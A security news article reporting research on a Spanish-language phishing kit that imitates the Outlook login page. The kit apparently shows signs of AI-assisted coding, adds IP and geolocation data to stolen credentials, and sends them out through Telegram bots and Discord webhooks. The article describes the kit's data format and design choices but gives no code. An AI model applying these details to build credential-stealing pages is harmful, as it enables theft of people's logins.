A Spanish-speaking phishing operation targeting Microsoft Outlook users has been active since March 2025, using a sophisticated kit that shows clear indicators of AI-assisted development.
The campaign, tracked through a unique signature of four mushroom emojis embedded in the string “OUTL,” has been observed in over 75 distinct deployments.
The operation captures email credentials along with victim IP addresses and geolocation data, exfiltrating stolen information through Telegram bots and Discord webhooks.
The phishing kit mimics Microsoft’s Outlook login interface with Spanish language prompts, presenting victims with a convincing authentication page.
.webp "New Phishing Kit with AI-assisted Development Attacking Microsoft Users to Steal Logins 2")
Once users enter their credentials, the kit immediately enriches the stolen data with contextual information by querying api.ipify.org for IP resolution and ipapi.co for geolocation details.
This automated reconnaissance happens in real time before the credentials are packaged and transmitted to the attackers.
The operation demonstrates a high level of technical planning, with multiple variants showing consistent operational patterns despite changes in their obfuscation techniques.
The Sage Hollow researchers identified the campaign after discovering the mushroom emoji signature, which served as a reliable pivot point to track additional deployments.
Analysis of the kit’s evolution revealed several distinct variants, ranging from heavily obfuscated scripts with anti-analysis traps to completely unobfuscated code that resembles AI-generated patterns.
.webp "New Phishing Kit with AI-assisted Development Attacking Microsoft Users to Steal Logins 4")
The most recent variant, called disBLOCK.js, features clean indentation, clearly named functions, and Spanish-language comments that explain each execution stage, characteristics strongly associated with AI-assisted code generation rather than manually developed tools.
Infection Mechanism
The phishing kit operates through a modular architecture where configuration data is separated from execution logic. In early deployments, a script named xjsx.js served as a configuration container, storing Telegram bot tokens and chat IDs using light array rotation obfuscation.
The victim data collection follows a fixed sequence: when a user submits credentials through the fake login form, the kit first validates the email format using a regular expression pattern.
It then triggers the fetchIPData function, which makes HTTPS requests to external APIs to gather IP and location information.
The exfiltration payload maintains a standardized format across all variants, structured as “OUTL CORREO: [victim_email] PASSWR: [victim_password] IP: [ip_address]” followed by location details.
.webp "New Phishing Kit with AI-assisted Development Attacking Microsoft Users to Steal Logins 5")
Network captures show the data being transmitted via standard HTTPS POST requests to either Telegram bot APIs or Discord webhook endpoints.
The shift toward Discord webhooks represents a tactical evolution, as these function as write-only channels that prevent defenders from accessing historical exfiltration data even when the webhook URL is discovered.
The kit’s infrastructure analysis reveals a service-oriented ecosystem with deliberately compartmentalized deployment layers while maintaining selective convergence at the exfiltration level, indicating a phishing-as-a-service model where different operators may be using the same underlying toolkit.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
